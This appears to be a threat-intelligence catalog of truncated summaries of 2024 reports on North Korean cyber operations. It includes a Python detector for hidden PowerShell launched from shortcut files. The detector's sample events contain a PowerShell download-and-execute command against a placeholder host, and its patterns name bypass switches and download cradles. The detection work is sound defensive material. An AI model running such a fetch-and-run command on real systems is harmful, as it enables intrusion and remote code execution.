The Penn State law article examines how North Korea uses cryptocurrency theft, especially against decentralized finance platforms, as an alternative revenue source under sanctions tied to its weapons programs. It argues that DeFi’s limited consumer protec…
2024 (654 reports)
DTEX describes DPRK remote IT-worker hiring attempts against Western organizations, including aerospace, defense, retail, and technology companies, and frames the risk as insider access that can support revenue generation, espionage, data theft, and disru…
Upon learning that his two main contributors to the LSM were directly linked to North Korea, Zaki should have immediately acted to address these concerns. Though described as a “rewrite,” their work mostly involved porting the original code for SDK compat…
They have previously targeted specific individuals, such as North Korean defectors and experts on North Korean affairs, using spear-phishing emails, malicious Android application package (.apk) files, and Internet Explorer vulnerabilities. The North Korean threat actor TA-RedAnt (also known as Red…
AhnLab ASEC and South Korea's NCSC describe a TA-RedAnt operation exploiting CVE-2024-38178, a Microsoft Internet Explorer scripting-engine type-confusion vulnerability, through a compromised domestic advertising-content delivery path. The attackers inser…
Microsoft's 2024 Digital Defense Report describes a more complex and dangerous cyber threat landscape in which nation-state and criminal actors are better resourced and more prepared. The excerpt says Microsoft and its customers face large volumes of atta…
Microstep Intelligence says Lazarus continues to target cryptocurrency-related personnel through fake recruiting and research projects posted on LinkedIn, X, Facebook, GitHub, and Stack Overflow. After moving victims into Telegram conversations, the opera…
A Kimsuky-linked Windows shortcut sample is disguised as a PDF guide about coin futures trading and is described as targeting people interested in cryptocurrency or futures trading. The LNK launches hidden, non-interactive PowerShell, builds a Dropboxuser…
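The hidden, non-interactive PowerShell launch described above leaves a recognisable process-creation pattern: Explorer spawns powershell.exe (the .lnk itself never appears in the process tree) with window-hiding and interactivity-suppressing switches. The following detection logic is an added example, not code from the report or from the author; the Sysmon-style events it scores are constructed sample telemetry, and the field names, thresholds and weights are assumptions chosen for illustration. It goes slightly beyond the summary by also scoring the other switches and cradles that typically accompany such launches.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation records (hypothetical sample
# telemetry, not data from the report). The first two mimic the LNK launch
# pattern described in the summary; the last two are benign controls.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {
        "pid": 4120,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -w hidden -noni -nop -ep bypass -c "
                        "\"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')\"",
    },
    {
        "pid": 4188,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -WindowStyle Hidden -NonInteractive -File C:\Users\u\AppData\Local\Temp\guide.ps1",
    },
    {
        "pid": 5020,
        "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoLogo",
    },
    {
        "pid": 5100,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": r"notepad.exe C:\Users\u\Desktop\notes.txt",
    },
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Command-line indicators. powershell.exe accepts the documented short forms
# (-w, -noni, -nop, -ex/-ep, -e/-ec) and unambiguous prefixes, so each pattern
# accepts the abbreviated spellings as well as the full switch name.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("hidden window (-WindowStyle Hidden, -w h, -w 1)", re.compile(r"-w[a-z]*\s+(?:h[a-z]*|1)\b", re.I)),
    ("non-interactive (-NonInteractive, -noni)", re.compile(r"-noni[a-z]*\b", re.I)),
    ("profile suppressed (-NoProfile, -nop)", re.compile(r"-nop[a-z]*\b", re.I)),
    ("execution policy bypassed (-ExecutionPolicy, -ex, -ep)", re.compile(r"-(?:ex[a-z]*|ep)\s+(?:bypass|unrestricted)\b", re.I)),
    ("encoded command (-EncodedCommand, -e, -ec)", re.compile(r"-(?:e|ec|en[a-z]*)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download or in-memory execution cradle", re.compile(r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|invoke-expression|iex)\b", re.I)),
    ("script run from user-writable path", re.compile(r"-f[a-z]*\s+\S*\\(?:temp|appdata|downloads|public)\\", re.I)),
]

FLAG_THRESHOLD = 3  # assumed tuning value; raise or lower for your environment


def _basename(path: str) -> str:
    """Last component of a Windows path, lower-cased (works on any host OS)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, object]) -> Tuple[int, List[str]]:
    """Score one process-creation event; returns (score, matched reasons)."""
    if _basename(str(event["image"])) not in POWERSHELL_IMAGES:
        return 0, []
    cmd = str(event["command_line"])
    reasons = [label for label, pattern in INDICATORS if pattern.search(cmd)]
    # A double-clicked .lnk makes explorer.exe the parent of its target, and
    # the shortcut file itself is not recorded in the process tree, so the
    # parent is the corroborating signal for a shortcut-driven launch.
    if _basename(str(event["parent_image"])) == "explorer.exe":
        reasons.append("launched by explorer.exe (consistent with a shortcut)")
    return len(reasons), reasons


def detect_lnk_powershell(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the events whose indicator score reaches FLAG_THRESHOLD."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= FLAG_THRESHOLD:
            hits.append({"pid": event["pid"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_lnk_powershell(SAMPLE_EVENTS):
        print(f"pid {hit['pid']} score {hit['score']}: " + "; ".join(hit["reasons"]))
```

On the constructed sample the two shortcut-style launches are flagged and the editor-spawned and non-PowerShell events are not. Because a legitimate scheduled task or installer may also use -NonInteractive or -NoProfile, the parent-process check and the threshold, rather than any single switch, carry the decision; in production the same logic is better expressed as a Sysmon or EDR rule over ParentImage, Image and CommandLine.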
Hauri reports that Lazarus is distributing InvisibleFerret malware through job-task lures aimed at job seekers, continuing to abuse GitHub repositories while changing obfuscation methods and adding keylogging capability. The analyzed downloader retrieves …
DoubleAgent analyzes a newly identified Linux variant of DPRK-attributed FASTCash malware built for payment-switch environments that process card transactions. The Ubuntu 20.04 sample adds to earlier AIX and Windows FASTCash variants and appears related t…
The report documents a Kimsuky-attributed phishing site impersonating Yonsei University webmail at rfa.lol/yonsei, with visual elements and contact details intended to make the fake login page appear legitimate. Captured request details show submitted use…
A Windows shortcut file is assessed by the author as suspected Konni activity, with the caveat that the attribution is not official. The lure is named as a domestic COVID-19 reinfection status PDF, suggesting possible interest in medical or public-health …
Silent Chollima, a North Korea-nexus actor also tracked as Stonefly, Andariel, Onyx Sleet, TDrop2, and DarkSeoul, was observed moving from its traditional espionage focus into apparent extortion and other financially motivated activity. Symantec-linked re…
Cobo analyzes the July 2024 WazirX incident as a Safe multisig compromise that let attackers transfer about $230 million in assets from an Indian exchange wallet. The wallet used a four-of-six approval model, with five WazirX hardware-wallet signers and o…
QuillAudits describes the September 2024 BingX hot-wallet breach, where attackers stole about $44.7 million and moved funds across multiple blockchains to complicate tracing. The source identifies drained BingX wallet addresses, attacker-controlled Ethere…